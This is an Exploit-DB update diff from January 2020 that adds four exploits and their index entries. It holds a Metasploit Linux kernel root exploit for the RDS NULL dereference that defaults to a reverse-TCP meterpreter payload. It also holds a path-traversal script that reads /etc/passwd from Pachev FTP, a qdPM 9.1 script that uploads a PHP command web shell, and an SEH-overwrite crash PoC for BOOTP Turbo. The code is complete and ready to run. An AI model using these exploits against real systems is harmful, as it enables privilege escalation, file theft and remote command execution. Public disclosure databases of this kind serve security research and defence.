DB: 2020-01-24

4 changes to exploits/shellcodes

BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)

Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)

Pachev FTP Server 1.0 - Path Traversal

qdPM 9.1 - Remote Code Execution

exploits/linux/local/47957.rb

@@ -0,0 +1,166 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Compile
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on Linux systems by abusing
+        a NULL pointer dereference in the `rds_atomic_free_op` function in the
+        Reliable Datagram Sockets (RDS) kernel module (rds.ko).
+
+        Successful exploitation requires the RDS kernel module to be loaded.
+        If the RDS module is not blacklisted (default); then it will be loaded
+        automatically.
+
+        This exploit supports 64-bit Ubuntu Linux systems, including distributions
+        based on Ubuntu, such as Linux Mint and Zorin OS.
+
+        Target offsets are available for:
+
+        Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and
+        Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.
+
+        This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.
+        Failed exploitation may crash the kernel.
+
+        This module has been tested successfully on various 4.4 and 4.8 kernels.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mohamed Ghannam', # Discovery of RDS rds_atomic_free_op null pointer dereference and DoS PoC (2018-5333)
+          'Jann Horn',       # Discovery of MAP_GROWSDOWN mmap_min_addr bypass technique and PoC code (CVE-2019-9213)
+          'wbowling',        # C exploit combining 2018-5333 and CVE-2019-9213 targeting Ubuntu 16.04 kernel 4.4.0-116-generic
+          'bcoles',          # Metasploit module and updated C exploit
+          'nstarke'          # Additional kernel offsets
+        ],
+      'DisclosureDate' => '2018-11-01',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'Privileged'     => true,
+      'References'     =>
+        [
+          [ 'CVE', '2018-5333' ],
+          [ 'CVE', '2019-9213' ],
+          [ 'BID', '102510' ],
+          [ 'URL', 'https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4' ],
+          [ 'URL', 'https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c' ],
+          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2' ],
+          [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html' ],
+          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737' ],
+          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d' ],
+          [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c' ]
+        ],
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_OS_DOWN ],
+        },
+      'DefaultTarget'  => 0))
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    arch = kernel_hardware
+    unless arch.include? 'x86_64'
+      return CheckCode::Safe("System architecture #{arch} is not supported")
+    end
+    vprint_good "System architecture #{arch} is supported"
+
+    offsets = strip_comments(exploit_data('CVE-2018-5333', 'cve-2018-5333.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
+    kernels = offsets.scan(/"(.+?)"/).flatten
+
+    version = "#{kernel_release} #{kernel_version.split(' ').first}"
+    unless kernels.include? version
+      return CheckCode::Safe("Linux kernel #{version} is not vulnerable")
+    end
+    vprint_good "Linux kernel #{version} is vulnerable"
+
+    if smap_enabled?
+      return CheckCode::Safe('SMAP is enabled')
+    end
+    vprint_good 'SMAP is not enabled'
+
+    if lkrg_installed?
+      return CheckCode::Safe('LKRG is installed')
+    end
+    vprint_good 'LKRG is not installed'
+
+    if grsec_installed?
+      return CheckCode::Safe('grsecurity is in use')
+    end
+    vprint_good 'grsecurity is not in use'
+
+    unless kernel_modules.include? 'rds'
+      vprint_warning 'rds.ko kernel module is not loaded, but may be autoloaded during exploitation'
+      return CheckCode::Detected('rds.ko kernel module is not loaded, but may be autoloaded during exploitation')
+    end
+    vprint_good 'rds.ko kernel module is loaded'
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.c')
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      upload_and_chmodx exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.out')
+    end
+    register_file_for_cleanup exploit_path
+
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_file_for_cleanup payload_path
+
+    # mincore KASLR bypass is usually fast, but can sometimes take up to 30 seconds to complete
+    timeout = 30
+    print_status "Launching exploit (timeout: #{timeout})..."
+    output = cmd_exec("echo '#{payload_path} & exit' | #{exploit_path}", nil, timeout)
+    output.each_line { |line| vprint_status line.chomp }
+  end
+end

exploits/linux/remote/47956.py

@@ -0,0 +1,19 @@
+# Exploit Title: Pachev FTP Server 1.0 - Path Traversal
+# Date: 2020-01-23
+# Vulnerability: Path Traversal
+# Exploit Author: 1F98D
+# Vendor Homepage: https://github.com/pachev/pachev_ftp
+
+from ftplib import FTP
+
+ip = raw_input("Target IP: ")
+port = int(raw_input("Target Port: "))
+
+ftp = FTP()
+ftp.connect(host=ip, port=port)
+ftp.login('pachev', '')                   
+ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write)
+ftp.close()
+file = open('passwd.txt', 'r')
+print "[**] Printing the contents of /etc/passwd\n"
+print file.read()

exploits/php/webapps/47954.py

@@ -0,0 +1,130 @@
+# Exploit Title: qdPM 9.1 - Remote Code Execution
+# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
+# Date: 2020-01-22
+# Exploit Author: Rishal Dwivedi (Loginsoft)
+# Vendor Homepage: http://qdpm.net/
+# Software Link: http://qdpm.net/download-qdpm-free-project-management
+# Version: <=1.9.1
+# Tested on: Windows 10 (Python 2.7)
+# CVE : CVE-2020-7246
+# Exploit written in Python 2.7
+# Tested Environment - Windows 10
+# Path Traversal + Remote Code Execution
+
+# Command - qdpm-exploit.py -url http://localhost/ -u user@localhost.com -p password
+# -*- coding: utf-8 -*-
+#!/usr/bin/python
+
+import requests
+from lxml import html
+from argparse import ArgumentParser
+
+session_requests = requests.session()
+
+def multifrm(
+    userid,
+    username,
+    csrftoken_,
+    EMAIL,
+    HOSTNAME,
+    uservar,
+    ):
+    request_1 = {
+        'sf_method': (None, 'put'),
+        'users[id]': (None, userid[-1]),
+        'users[photo_preview]': (None, uservar),
+        'users[_csrf_token]': (None, csrftoken_[-1]),
+        'users[name]': (None, username[-1]),
+        'users[new_password]': (None, ''),
+        'users[email]': (None, EMAIL),
+        'extra_fields[9]': (None, ''),
+        'users[remove_photo]': (None, '1'),
+        }
+    return request_1
+
+
+def req(
+    userid,
+    username,
+    csrftoken_,
+    EMAIL,
+    HOSTNAME,
+    ):
+    request_1 = multifrm(
+        userid,
+        username,
+        csrftoken_,
+        EMAIL,
+        HOSTNAME,
+        '.htaccess',
+        )
+    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update'
+                                , files=request_1)
+    request_2 = multifrm(
+        userid,
+        username,
+        csrftoken_,
+        EMAIL,
+        HOSTNAME,
+        '../.htaccess',
+        )
+    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update'
+                                 , files=request_2)
+    request_3 = {
+        'sf_method': (None, 'put'),
+        'users[id]': (None, userid[-1]),
+        'users[photo_preview]': (None, ''),
+        'users[_csrf_token]': (None, csrftoken_[-1]),
+        'users[name]': (None, username[-1]),
+        'users[new_password]': (None, ''),
+        'users[email]': (None, EMAIL),
+        'extra_fields[9]': (None, ''),
+        'users[photo]': ('backdoor.php',
+                         '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
+                         , 'application/octet-stream'),
+        }
+    upload_req = session_requests.post(HOSTNAME
+            + 'index.php/myAccount/update', files=request_3)
+
+
+def main(HOSTNAME, EMAIL, PASSWORD):
+    result = session_requests.get(HOSTNAME + '/index.php/login')
+    login_tree = html.fromstring(result.text)
+    authenticity_token = \
+        list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value"
+             )))[0]
+    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
+               'login[_csrf_token]': authenticity_token}
+    result = session_requests.post(HOSTNAME + '/index.php/login',
+                                   data=payload,
+                                   headers=dict(referer=HOSTNAME
+                                   + '/index.php/login'))
+    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount'
+            )
+    account_tree = html.fromstring(account_page.content)
+    userid = account_tree.xpath("//input[@name='users[id]']/@value")
+    username = account_tree.xpath("//input[@name='users[name]']/@value")
+    csrftoken_ = \
+        account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
+    req(userid, username, csrftoken_, EMAIL, HOSTNAME)
+    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
+    final_tree = html.fromstring(get_file.content)
+    backdoor = \
+        final_tree.xpath("//input[@name='users[photo_preview]']/@value")
+    print 'Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' \
+        + backdoor[-1] + '?cmd=whoami'
+
+
+if __name__ == '__main__':
+    parser = \
+        ArgumentParser(description='qdmp - Path traversal + RCE Exploit'
+                       )
+    parser.add_argument('-url', '--host', dest='hostname',
+                        help='Project URL')
+    parser.add_argument('-u', '--email', dest='email',
+                        help='User email (Any privilege account)')
+    parser.add_argument('-p', '--password', dest='password',
+                        help='User password')
+    args = parser.parse_args()
+
+    main(args.hostname, args.email, args.password)

exploits/windows/dos/47955.py

@@ -0,0 +1,48 @@
+# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
+# Exploit Author: boku
+# Date: 2020-01-22
+# Software Vendor: Wierd Solutions
+# Vendor Homepage: https://www.weird-solutions.com
+# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
+# Version: BOOTP Turbo (x86) Version 2.0
+# Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC
+# Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit 
+# Replicate Crash:
+#  1) Download, Install, and Open BootP Turbo v2.0 for windows x86
+#  2) Go to Edit > Settings > Click the Detailed Logging Box
+#  3) Run python script, open created file 'crash.txt'
+#  4) Select-All > Copy All, from file
+#  5) Paste buffer in the 'Log File' text-box, Click 'OK'
+#  6) Close the 'Control Service' Pop-Up Window
+#  7) Crash with SEH Overwrite
+
+# SEH chain of main thread
+# Address    SE handler
+# 019CD254   43434343
+# 42424242   *** CORRUPT ENTRY ***
+
+# Loaded Application Modules
+#  Rebase | SafeSEH | ASLR  | NXCompat | Version, Modulename & Path
+#  True   | True    | False |  False   | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll)
+#  True   | True    | False |  False   | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll)
+#  True   | True    | False |  False   | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll)
+#  True   | True    | False |  False   | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe)
+#  True   | True    | False |  False   | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll)
+
+#!/usr/bin/python
+
+offset = '\x41'*2196
+nSEH = '\x42\x42\x42\x42'
+SEH = '\x43\x43\x43\x43'
+filler = '\x44'*(3000-len(offset+nSEH+SEH))
+
+payload = offset+nSEH+SEH+filler
+
+try:
+    f=open("crash.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

files_exploits.csv

@@ -6661,6 +6661,7 @@ id,file,description,date,author,type,platform,port
 47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,
 47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple,
+47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10915,6 +10916,7 @@ id,file,description,date,author,type,platform,port
 47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,
 47945,exploits/xml/local/47945.txt,"Easy XML Editor 1.7.8 - XML External Entity Injection",2020-01-20,"Javier Olmedo",local,xml,
 47950,exploits/windows/local/47950.txt,"NEOWISE CARBONFTP 1.4 - Weak Password Encryption",2020-01-21,hyp3rlinx,local,windows,
+47957,exploits/linux/local/47957.rb,"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)",2020-01-23,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17944,6 +17946,7 @@ id,file,description,date,author,type,platform,port
 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java,
 47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux,
 47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware,
+47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42252,4 +42255,5 @@ id,file,description,date,author,type,platform,port
 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,
 47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php,
 47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java,
+47954,exploits/php/webapps/47954.py,"qdPM 9.1 - Remote Code Execution",2020-01-23,"Rishal Dwivedi",webapps,php,
 47951,exploits/xml/webapps/47951.py,"Citrix XenMobile Server 10.8 - XML External Entity Injection",2020-01-22,"Jonas Lejon",webapps,xml,